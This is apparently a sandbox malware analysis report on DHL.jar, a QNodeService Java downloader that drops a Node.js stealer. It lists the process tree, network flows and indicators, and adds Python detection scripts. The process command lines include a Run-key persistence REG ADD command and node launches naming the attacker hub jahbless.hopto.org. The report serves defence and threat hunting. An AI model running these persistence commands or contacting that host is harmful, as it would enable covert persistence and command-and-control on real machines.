Analysis

  • max time kernel: 146s
  • max time network: 128s
  • platform: windows10_x64
  • resource: win10
  • submitted: 12/10/2020, 06:16 UTC

General

  • Target: DHL.jar
  • Size: 318KB
  • MD5: ba3c3a491c1f542ba70b5cba78664c27
  • SHA1: e3f3836cbd6c20799d5fd847852732ec6bbb64a6
  • SHA256: f104ffa104dc5c0739ed98c605c0cc32fc148aa40dab5de2916d9b1f864a4654
  • SHA512: 7d0201320644db94497f6e1d0584a2be985210c205ae63a3ba4aaa7831d778aa5893e608ed96c082e31f4e63173ff626043cf90af93a2a747710366fa6745b50

Malware Config

Signatures

  • QNodeService
    Trojan/stealer written in Node.js and spread via a Java downloader.
  • Executes dropped EXE (3 IoCs)
  • Adds Run key to start application (2 TTPs, 2 IoCs)
  • JavaScript code in executable (3 IoCs)
  • Looks up external IP address via web service (2 IoCs)
    Uses a legitimate IP lookup service to find the infected system's external IP.
  • Checks processor information in registry (2 TTPs, 6 IoCs)
    Processor information is often read in order to detect sandboxing environments. In this run the reads come from node.exe (PID 968), and the Node.js runtime itself reads HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor whenever os.cpus() is called (libuv's uv_cpu_info), so treat this hit as supporting evidence alongside the other signatures rather than proof of a deliberate evasion check.
  • Suspicious behavior: EnumeratesProcesses (18 IoCs)
  • Suspicious use of WriteProcessMemory (12 IoCs)

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\DHL.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3700
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c354b6e.tmp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1744
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain jahbless.hopto.org --hub-domain localhost
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:3848
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2172
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost
            5⤵
            • Executes dropped EXE
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:968
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2972
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                7⤵
                • Adds Run key to start application
                PID:1196
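The chain above reads: java.exe runs DHL.jar, which drops a second jar as a .tmp file and runs it under javaw.exe; that stage launches node.exe from the user profile with `-` (Node's alias for "read the script from stdin", so the first Node stage arrives over a pipe rather than as a file), which in turn runs boot.js from %TEMP% and finally persists through a Run value named with a GUID that launches boot.vbs via cmd. The following is an added example, not part of the Triage report or of QNodeService, that parses those command lines and flags each of these patterns. The process map is transcribed from the report (the cmd.exe parent, PID 2972, only wraps the identical REG ADD command and is left out); the rule names, the script-extension list and the choice of what counts as a user-profile path are my own assumptions.

```python
import re

# Constructed sample: the process command lines from the report, keyed by PID.
# The cmd.exe parent (PID 2972) only wraps the identical REG ADD command and is left out.
SAMPLE_PROCESSES = {
    3700: r'java -jar C:\Users\Admin\AppData\Local\Temp\DHL.jar',
    1744: r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c354b6e.tmp',
    3848: r'C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain jahbless.hopto.org --hub-domain localhost',
    968: r'C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_vwXpV9\boot.js --hub-domain jahbless.hopto.org --hub-domain localhost',
    1196: r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4150b6ef-79e8-4958-a0e7-711c10eeb34d" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""',
}

# REG ADD "<key>" /V "<name>" /t <type> [/F] /D "<data>"; the data may contain \" escapes.
REG_ADD = re.compile(
    r'REG\s+ADD\s+"(?P<key>[^"]+)"\s+/V\s+"(?P<name>[^"]+)"\s+/t\s+(?P<type>\w+)'
    r'(?:\s+/F)?\s+/D\s+"(?P<data>.*)"\s*$',
    re.IGNORECASE,
)
RUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?$', re.IGNORECASE)
GUID = re.compile(r'^\{?[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}?$', re.IGNORECASE)
USER_PROFILE = re.compile(r'^[a-z]:\\Users\\[^\\]+\\', re.IGNORECASE)
# Script extensions treated as suspicious autostart targets (assumption for this example).
SCRIPT_PATH = re.compile(r'[a-z]:\\[^"]*?\.(?:vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b', re.IGNORECASE)
HUB_DOMAIN = re.compile(r'--hub-domain\s+(\S+)')
TMP_JAR = re.compile(r'-jar\s+"?([^"\s]+\.tmp)\b', re.IGNORECASE)


def executable(cmdline):
    """Image path or name: the quoted first token, or the bare token up to the first space."""
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.index('"', 1)]
    return cmdline.split(' ', 1)[0]


def parse_reg_add(cmdline):
    """Pull key, value name, type and (unescaped) data out of a REG ADD command line."""
    m = REG_ADD.search(cmdline)
    if not m:
        return None
    return {
        'key': m['key'],
        'name': m['name'],
        'type': m['type'].upper(),
        'data': m['data'].replace('\\"', '"'),
    }


def analyze(processes):
    """Return (pid, rule, detail) findings over a {pid: command line} map."""
    findings = []
    for pid, cmd in processes.items():
        exe = executable(cmd)
        image = exe.rsplit('\\', 1)[-1].lower()
        reg = parse_reg_add(cmd)
        if reg:
            # Persistence: a Run/RunOnce value, a GUID-style value name, and a script under C:\Users.
            if RUN_KEY.search(reg['key']):
                findings.append((pid, 'run_key_autostart', reg['key'] + '\\' + reg['name']))
            if GUID.match(reg['name']):
                findings.append((pid, 'guid_value_name', reg['name']))
            script = SCRIPT_PATH.search(reg['data'])
            if script and USER_PROFILE.match(script.group(0)):
                findings.append((pid, 'autostart_script_in_user_profile', script.group(0)))
        # Staging: a Node runtime executed from a user-writable directory, with hub domains on the command line.
        if image == 'node.exe' and USER_PROFILE.match(exe):
            findings.append((pid, 'node_from_user_profile', exe))
        hubs = HUB_DOMAIN.findall(cmd)
        if hubs:
            findings.append((pid, 'hub_domain_arg', ','.join(hubs)))
        # Dropper: a Java host running a jar that hides behind a .tmp extension.
        if image in ('java', 'java.exe', 'javaw.exe'):
            jar = TMP_JAR.search(cmd)
            if jar:
                findings.append((pid, 'jar_from_tmp_file', jar.group(1)))
    return findings


if __name__ == '__main__':
    for pid, rule, detail in analyze(SAMPLE_PROCESSES):
        print(f'{pid:>5}  {rule:<34} {detail}')
```

The same functions can be pointed at a Sysmon event ID 1 or EDR command-line feed; the REG ADD parser is the piece that matters for hunting, because the GUID value name changes per infection while the shape of the command (Run key, cmd /C wrapper, .vbs under the profile) does not.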

Network

  DNS (all queries to 8.8.8.8:53)

  name                 type  answer(s)
  nodejs.org           A     104.20.22.46, 104.20.23.46
  jahbless.hopto.org   A     18.229.141.132
  wtfismyip.com        A     95.217.228.176

  Flows (bytes and packets are sent / received from the sandbox's side; the DNS rows match the query and answer sizes above)

  remote address        domain               proto  process    sent     received  pkts sent  pkts recv
  104.20.22.46:443      nodejs.org           tls    javaw.exe  458.0kB  29.6MB    9943       19808
  18.229.141.132:443    jahbless.hopto.org   tls    node.exe   865 B    3.1kB     7          6
  18.229.141.132:443    jahbless.hopto.org   tls    node.exe   323.3kB  13.7MB    5708       9143
  18.229.141.132:443    jahbless.hopto.org   tls    node.exe   865 B    3.1kB     7          6
  18.229.141.132:443    jahbless.hopto.org   tls    node.exe   2.9kB    3.8kB     20         14
  95.217.228.176:443    wtfismyip.com        tls    node.exe   895 B    3.9kB     8          10
  127.0.0.1:443         -                    -      node.exe   21 loopback connections; no sizes or packet counts recorded
  8.8.8.8:53            nodejs.org           dns    -          56 B     88 B      1          1
  8.8.8.8:53            jahbless.hopto.org   dns    -          64 B     80 B      1          1
  8.8.8.8:53            wtfismyip.com        dns    -          59 B     75 B      1          1

  Reading the flows: javaw.exe pulls about 29.6 MB over TLS from nodejs.org, which is consistent with the dropped node-v14.12.0-win-x64 runtime that the process tree then executes from the user profile. node.exe talks only to jahbless.hopto.org (one of the sessions receives 13.7 MB) and to wtfismyip.com. hopto.org is a No-IP dynamic-DNS parent domain, so 18.229.141.132 is just the address the hostname pointed at during this run; pivot on the hostname, not the IP. The wtfismyip.com request is the external-IP lookup noted under Signatures; the service itself is legitimate. The 21 connections to 127.0.0.1:443 are consistent with the second `--hub-domain localhost` value seen on the node.exe command lines.
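As an added example, not part of the Triage report, here is a small triage pass over the flow table: it flags dynamic-DNS hostnames, public external-IP lookup services, and multi-megabyte downloads by script hosts, and sums bytes received per host. The rows are transcribed from the report (the loopback entries carry no sizes and are omitted); the dynamic-DNS suffix list, the IP-lookup host list, the script-host list and the 5 MB threshold are partial lists and assumptions of my own, not anything the report states.

```python
import re
from collections import defaultdict

# Constructed sample transcribed from the report's flow table:
# (remote, domain, proto, process, bytes sent, bytes received, packets sent, packets received).
# The 21 loopback 127.0.0.1:443 entries carry no sizes in the report and are left out.
SAMPLE_FLOWS = [
    ('104.20.22.46:443', 'nodejs.org', 'tls', 'javaw.exe', '458.0kB', '29.6MB', 9943, 19808),
    ('18.229.141.132:443', 'jahbless.hopto.org', 'tls', 'node.exe', '865 B', '3.1kB', 7, 6),
    ('18.229.141.132:443', 'jahbless.hopto.org', 'tls', 'node.exe', '323.3kB', '13.7MB', 5708, 9143),
    ('18.229.141.132:443', 'jahbless.hopto.org', 'tls', 'node.exe', '865 B', '3.1kB', 7, 6),
    ('18.229.141.132:443', 'jahbless.hopto.org', 'tls', 'node.exe', '2.9kB', '3.8kB', 20, 14),
    ('95.217.228.176:443', 'wtfismyip.com', 'tls', 'node.exe', '895 B', '3.9kB', 8, 10),
    ('8.8.8.8:53', 'nodejs.org', 'dns', None, '56 B', '88 B', 1, 1),
    ('8.8.8.8:53', 'jahbless.hopto.org', 'dns', None, '64 B', '80 B', 1, 1),
    ('8.8.8.8:53', 'wtfismyip.com', 'dns', None, '59 B', '75 B', 1, 1),
]

# Partial lists (assumptions for this example, not exhaustive): dynamic-DNS parent
# domains, public "what is my IP" services, and script hosts that rarely have a
# legitimate reason to pull multi-megabyte payloads.
DYNAMIC_DNS_SUFFIXES = ('hopto.org', 'ddns.net', 'no-ip.org', 'no-ip.biz', 'zapto.org',
                        'sytes.net', 'myftp.org', 'duckdns.org', 'dyndns.org')
IP_LOOKUP_HOSTS = {'wtfismyip.com', 'api.ipify.org', 'icanhazip.com', 'ifconfig.me',
                   'ipinfo.io', 'ip-api.com', 'checkip.amazonaws.com'}
SCRIPT_HOSTS = {'java.exe', 'javaw.exe', 'node.exe', 'powershell.exe', 'wscript.exe',
                'cscript.exe', 'mshta.exe'}
LARGE_DOWNLOAD_BYTES = 5_000_000  # arbitrary threshold for this example

_UNITS = {'b': 1, 'kb': 1_000, 'mb': 1_000_000, 'gb': 1_000_000_000}


def parse_size(text):
    """'29.6MB' / '865 B' -> bytes, using the decimal units the report displays."""
    m = re.fullmatch(r'\s*([\d.]+)\s*([kmg]?b)\s*', text, re.IGNORECASE)
    if not m:
        raise ValueError(f'unrecognised size: {text!r}')
    return int(round(float(m.group(1)) * _UNITS[m.group(2).lower()]))


def is_dynamic_dns(domain):
    """True when the name sits directly under one of the dynamic-DNS parent domains."""
    d = domain.lower()
    return any(d == s or d.endswith('.' + s) for s in DYNAMIC_DNS_SUFFIXES)


def bytes_received_by_host(flows):
    """Total bytes received per host over application (non-DNS) flows."""
    totals = defaultdict(int)
    for remote, domain, proto, _proc, _sent, recv, _ps, _pr in flows:
        if proto == 'dns':
            continue
        totals[domain or remote.rsplit(':', 1)[0]] += parse_size(recv)
    return dict(totals)


def triage_flows(flows):
    """Return de-duplicated (rule, host, detail) findings over the flow table."""
    findings = {}
    for remote, domain, proto, proc, _sent, recv, _ps, _pr in flows:
        host = domain or remote.rsplit(':', 1)[0]
        who = proc or 'dns'
        if domain and is_dynamic_dns(domain):
            findings.setdefault(('dynamic_dns', host), f'{who} -> {remote}')
        if domain and domain.lower() in IP_LOOKUP_HOSTS:
            findings.setdefault(('external_ip_lookup', host), f'{who} -> {remote}')
        recv_b = parse_size(recv)
        if proc in SCRIPT_HOSTS and recv_b >= LARGE_DOWNLOAD_BYTES:
            findings.setdefault(('large_download_by_script_host', host),
                                f'{proc} received {recv_b:,} bytes from {remote}')
    return sorted((rule, host, detail) for (rule, host), detail in findings.items())


if __name__ == '__main__':
    for rule, host, detail in triage_flows(SAMPLE_FLOWS):
        print(f'{rule:<30} {host:<22} {detail}')
    for host, total in sorted(bytes_received_by_host(SAMPLE_FLOWS).items()):
        print(f'{host:<22} {total:>12,} bytes received')
```

Findings are keyed by (rule, host) so the four sessions to jahbless.hopto.org collapse into one line while the per-host totals still show that the hub delivered 13.7 MB in a single session; in a real feed the same de-duplication keeps beaconing from drowning the alert list.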

MITRE ATT&CK Enterprise v6


Downloads

  • memory/968-177-0x000000E6BE4C0000-0x000000E6BE4C1000-memory.dmp (4KB)
  • memory/2172-173-0x000001F93B900000-0x000001F93B901000-memory.dmp (4KB)
  • memory/3848-170-0x000001F018240000-0x000001F018241000-memory.dmp (4KB)
